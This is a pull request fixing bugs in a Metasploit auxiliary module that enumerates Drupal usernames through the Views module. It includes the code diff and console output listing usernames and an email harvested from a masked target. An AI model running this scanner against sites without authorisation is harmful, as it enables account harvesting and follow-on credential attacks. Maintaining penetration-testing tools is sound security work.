### PR TITLE
Fix bugs in drupal_views_user_enum

### DIFF
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -44,19 +44,21 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def check_host(ip)
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'     => base_uri,
       'method'  => 'GET',
       'headers' => { 'Connection' => 'Close' }
-    }, 25)
+    )
 
-    if not res
+    unless res
       return Exploit::CheckCode::Unknown
-    elsif res and res.body =~ /\<title\>Access denied/
+    end
+
+    if res.body.include?('Access denied')
       # This probably means the Views Module actually isn't installed
-      vprint_error("#{rhost} - Access denied")
+      print_error("#{peer} - Access denied")
       return Exploit::CheckCode::Safe
-    elsif res and res.message != 'OK' or res.body != '[  ]'
+    elsif res.message != 'OK' || res.body != '[  ]'
       return Exploit::CheckCode::Safe
     else
       return Exploit::CheckCode::Appears
@@ -94,59 +96,57 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    print_status("Begin enumerating users at #{ip}")
+    print_status("Begin enumerating users at #{vhost}")
 
     results = []
     ('a'..'z').each do |l|
       vprint_status("Iterating on letter: #{l}")
 
-      res = send_request_cgi({
-        'uri'     => base_uri+l,
+      res = send_request_cgi(
+        'uri'     => "#{base_uri}#{l}",
         'method'  => 'GET',
         'headers' => { 'Connection' => 'Close' }
-      }, 25)
+      )
 
-      if (res and res.message == "OK")
-        user_list = res.body.scan(/\w+/)
+      if res && res.message == 'OK'
+        begin
+          user_list = JSON.parse(res.body)
+        rescue JSON::ParserError => e
+          elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+          return []
+        end
         if user_list.empty?
-          vprint_line("\tFound: Nothing")
+          vprint_error("Not found with: #{l}")
         else
-          vprint_line("\tFound: #{user_list.inspect}")
-          results << user_list
+          vprint_good("Found: #{user_list}")
+          results << user_list.flatten.uniq
         end
       else
-        print_error("Unexpected results from server")
+        print_error("#{peer} - Unexpected results from server")
         return
       end
     end
 
-    final_results = results.flatten.uniq
-
-    print_status("Done. " + final_results.length.to_s + " usernames found...")
-
-    final_results.each do |user|
+    print_status("Done. #{results.length} usernames found...")
+    results.flatten.uniq.each do |user|
       print_good("Found User: #{user}")
 
       report_cred(
         ip: Rex::Socket.getaddress(datastore['RHOST']),
         port: datastore['RPORT'],
         user: user,
-        proof: base_uri+l
+        proof: base_uri
       )
     end
 
-    # One username per line
-    final_results = final_results * "\n"
-
+    results = results * "\n"
     p = store_loot(
       'drupal_user',
       'text/plain',
       Rex::Socket.getaddress(datastore['RHOST']),
-      final_results.to_s,
+      results.to_s,
       'drupal_user.txt'
     )
-
     print_status("Usernames stored in: #{p}")
   end
-
 end


### PR DESCRIPTION
This PR plan to fix two bugs found in this module.

1 - Displays an error running (`run`) the module because the variable `l` is not set correctly.

```
msfdevel 10.0.2.15 shell[s]:0 job[s]:0 msf> auxiliary(drupal_views_user_enum)  run

[*] Begin enumerating users at 200.00.000.000
[*] Done. 18 usernames found...
[+] Found User: Anonymous
[-] Auxiliary failed: NameError undefined local variable or method `l' for #<Msf::Modules::Mod617578696c696172792f7363616e6e65722f687474702f64727570616c5f76696577735f757365725f656e756d::Metasploit3:0x1210e50c>
[-] Call stack:
[-]   /home/espreto/Devel/git/metasploit-framework/modules/auxiliary/scanner/http/drupal_views_user_enum.rb:134:in `block in run_host'
[-]   /home/espreto/Devel/git/metasploit-framework/modules/auxiliary/scanner/http/drupal_views_user_enum.rb:127:in `each'
[-]   /home/espreto/Devel/git/metasploit-framework/modules/auxiliary/scanner/http/drupal_views_user_enum.rb:127:in `run_host'
[-]   /home/espreto/Devel/git/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:116:in `block (2 levels) in run'
[-]   /home/espreto/Devel/git/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `call'
[-]   /home/espreto/Devel/git/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed
msfdevel 10.0.2.15 shell[s]:0 job[s]:0 msf> auxiliary(drupal_views_user_enum)  
```

Fixing the code and running again, the output is wrong. As an example, if the value returned is "foo.bar@domain.com.br", the module returns as many users found.

```
msfdevel 10.0.2.15 shell[s]:0 job[s]:0 msf> auxiliary(drupal_views_user_enum)  run

[*] Begin enumerating users at 200.00.000.000
[*] Done. 13 usernames found...
[+] Found User: Anonymous
[+] Found User: admin
[+] Found User: foo
[+] Found User: bar
[+] Found User: domain
[+] Found User: com
[+] Found User: br
[+] Found User: Fulano
[+] Found User: Ciclano
[+] Found User: beltano
[+] Found User: manager_locais
[+] Found User: beli
[+] Found User: marujo
[*] Usernames stored in: /home/espreto/.msf4/loot/20151004052932_default_200.00.000.000_drupal_user_350256.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfdevel 10.0.2.15 shell[s]:0 job[s]:0 msf> auxiliary(drupal_views_user_enum)  
```

After correcting the module is functioning properly.

```
msfdevel 10.0.2.15 shell[s]:0 job[s]:0 msf> auxiliary(drupal_views_user_enum)  run

[*] Begin enumerating users at 200.00.000.000
[*] Done. 9 usernames found...
[+] Found User: Anonymous
[+] Found User: admin
[+] Found User: foo.bar@domain.com.br
[+] Found User: Fulano
[+] Found User: Ciclano
[+] Found User: beltrano
[+] Found User: manager_locais
[+] Found User: beli
[+] Found User: beli.marujo
[*] Usernames stored in: /home/espreto/.msf4/loot/20151004051429_default_200.00.000.000_drupal_user_960657.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfdevel 10.0.2.15 shell[s]:0 job[s]:0 msf> auxiliary(drupal_views_user_enum) 
```
